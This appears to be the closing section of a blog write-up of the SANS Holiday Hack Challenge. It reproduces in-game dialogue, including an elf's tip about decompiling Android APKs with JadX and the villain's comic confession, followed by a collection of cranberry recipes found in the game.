Hi, my name is Shinny Upatree. I’m one of Santa’s bug bounty elves. I’m the newest elf on Santa’s bug bounty team. I’ve been spending my time reversing Android Apps. Did you know android APK files are just zip files? If you unzip them, you can look at the application files. Android apps written in Java can be reverse engineered back into the Java form using JadX. The JadX-gui tool is quick and easy to decompile an APK, but the jadx command-line tool will export the APK as individual Java Files. Android Studio can import JadX’s decompiled files. It makes it easier to understand obfuscated code. Take a look at Joshua Wright’s presentation from HackFest 2016 on using Android Studio and JadX effectively.

Hay, I’m Jason. I guess I’m a hay bale this year.


Moo!


Well, hello there. You’ve rescued me! Thank you so much. I wish I could recall the circumstances that led me to be imprisoned here in my very own Dungeon For Errant Reindeer (DFER). But I seem to be suffering from short-term memory loss. It feels almost as though someone hit me over the head with a Christmas Tree. I have no memory of what happened or who did that to me.

But this I do know. I wish I could stay here and properly thank you, my friend. But it is Christmas Eve and I MUST get all of these presents delivered before sunrise! I bid you a VERY MERRY CHRISTMAS… AND A HAPPY NEW YEAR!

The question of the hour is this: Who nabbed Santa? The answer? Yes, I did.

Next question: Why would anyone in his right mind kidnap Santa Claus? The answer: Do I look like I’m in my right mind? I’m a madman with a box. I have looked into the time vortex and I have seen a universe in which the Star Wars Holiday Special was NEVER released. In that universe, 1978 came and went as normal. No one had to endure the misery of watching that abominable blight. People were happy there. It’s a better life, I tell you, a better world than the scarred one we endure here. Give me a world like that. Just once.

So I did what I had to do. I knew that Santa’s powerful North Pole Wonderland Magick could prevent the Star Wars Special from being released, if I could leverage that magick with my own abilities back in 1978. But Jeff refused to come with me, insisting on the mad idea that it is better to maintain the integrity of the universe’s timeline. So I had no choice – I had to kidnap him. It was one of those days. Well. You know what I mean.

Anyway… Since you interfered with my plan, we’ll have to live with the Star Wars Holiday Special in this universe… FOREVER. If we attempt to go back again, to cross our own timeline, we’ll cause a temporal paradox, a wound in time. We’ll never be rid of it now. The Star Wars Holiday Special will plague this world until time itself ends… All because you foiled my brilliant plan. Nice work.

Recipes

From Train Console

Just in case you wanted to know, here's a really good Cranberry pie recipe:
Ingredients
1 recipe pastry for a 9 inch double crust pie
1 1/2 cups white sugar
1/3 cup all-purpose flour
1/4 teaspoon salt
1/2 cup water 
1 (12 ounce) package fresh cranberries
1/4 cup lemon juice
1 dash ground cinnamon
2 teaspoons butter
Directions:
1) Preheat oven to 425 degrees F (220 degrees C.)
2) In a saucepan, combine sugar, flour, salt and water. Bring to a boil and cook, stirring constantly until thick and smooth. Add berries, lemon juice and cinnamon. Cook 5 minutes until mixture is thick and berries pop. Remove from heat and stir in butter.
3) Roll one ball of dough out to fit a 9 inch pie plate. Place bottom crust in pie plate. Spoon in filling. Roll out top crust and cut into strips for lattice. Place lattice strips on top and seal edges.
4) Bake in the preheated oven for 40 minutes, or until crust is golden brown.

From CranPi Image

MMMMM----- Recipe via Meal-Master (tm) v7.07
 
      Title: Candied Cranberries
 Categories: Candies, Christmas
   Servings:  2
 
      1 c  Sugar
      2 tb Water
    1/2 c  Cranberries
 
  Cook 1/2 cup sugar and 2 tablespoons water in heavy small saucepan over low
  heat, stirring until sugar dissolves. Transfer to top of double boiler. Add
  cranberries. Cover berry mixture and place over simmering water. Cook 45
  minutes, stirring occasionally. Remove from over water. Let cranberry
  mixture stand at room temperature overnight.
  
  Place remaining 1/2 cup sugar on plate. Drain cranberries well. Add t sugar
  and turn to coat. Let dry at least 30 minutes. (Can be prepared 3 days
  ahead. Cover and refrigerate.)
  
  Makes about 1/2 cup

Cranberry-Jalapeno Salsa

Finely chop 2 cups cranberries with 1/4 cup sugar in a food processor. Toss with 1/3 cup each chopped cucumber and cilantro, 1/4 cup chopped white onion, 1 minced jalapeno, 1 tablespoon lime juice and 1/2 teaspoon kosher salt.

Read more at: http://www.foodnetwork.com/recipes/articles/50-things-to-make-with-cranberries.html?oc=linkback

Cranberry Jelly 

Bring 4 cups cranberries, 2 cups sugar, 1 cup water, 2 tablespoons lemon juice and a pinch of salt to a boil. Reduce the heat to medium and simmer until the berries pop and the sauce thickens, 20 to 25 minutes; cool. Puree, then strain. Chill.

Read more at: http://www.foodnetwork.com/recipes/articles/50-things-to-make-with-cranberries.html?oc=linkback

Cranberry-Mint Chutney 

Bring 1 cup cranberries, 3/4 cup each sugar and water, 1/2 cup dried cranberries and a pinch of salt to a boil. Reduce the heat to medium; simmer until the berries pop and the chutney thickens, 10 minutes; cool slightly. Stir in 1/2 cup chopped cranberries, 1/4 cup chopped mint and 2 tablespoons cider vinegar.

Read more at: http://www.foodnetwork.com/recipes/articles/50-things-to-make-with-cranberries.html?oc=linkback

Cranberry-Port Sauce

Cook 1/3 cup minced red onion in 1 tablespoon butter over medium heat until softened. Add 1/2 cup ruby port; simmer until reduced by half. Add 1 cup cranberries, 3/4 cup chicken broth, 2 tablespoons each sugar and orange juice, and 1/4 teaspoon mustard powder. Simmer, lightly smashing the berries, until thickened, 10 minutes. Season with salt and pepper.

Read more at: http://www.foodnetwork.com/recipes/articles/50-things-to-make-with-cranberries.html?oc=linkback

Cranberry-Pear Sauce 

Simmer 4 cups cranberries, 2 chopped peeled pears, 2 cups water, 1 cup sugar and 1/2 teaspoon ground cardamom over medium heat until the berries pop and the sauce thickens, 25 minutes; cool.

Read more at: http://www.foodnetwork.com/recipes/articles/50-things-to-make-with-cranberries.html?oc=linkback

Directions
Empty a 12-ounce bag of fresh or frozen cranberries into a saucepan and transfer 1/2 cup to a small bowl. Add 1 cup sugar, 1 strip orange or lemon zest and 2 tablespoons water to the pan and cook over low heat, stirring occasionally, until the sugar dissolves and the cranberries are soft, about 10 minutes. Increase the heat to medium and cook until the cranberries burst, about 12 minutes. Reduce the heat to low and stir in the reserved cranberries. Add sugar, salt and pepper to taste and cool to room temperature before serving.
Photograph by Jonathan Kantor
Recipe courtesy of Food Network Magazine



Read more at: http://www.foodnetwork.com/recipes/food-network-kitchens/perfect-cranberry-sauce-recipe.html?oc=linkback

Sugared Cranberries 

Bring 1/2 cup each sugar and water to a boil. Pour over 1 1/2 cups cranberries. Cool 1 hour; drain. Roll in 1/2 cup sugar on a baking sheet. Let dry 4 hours.

Read more at: http://www.foodnetwork.com/recipes/articles/50-things-to-make-with-cranberries.html?oc=linkback


Well, that’s all for this one. A big shout out to @edskoudis and the SANS team for putting this together for another year; I am already looking forward to the next one.

As usual. Questions, Queries, Comments below.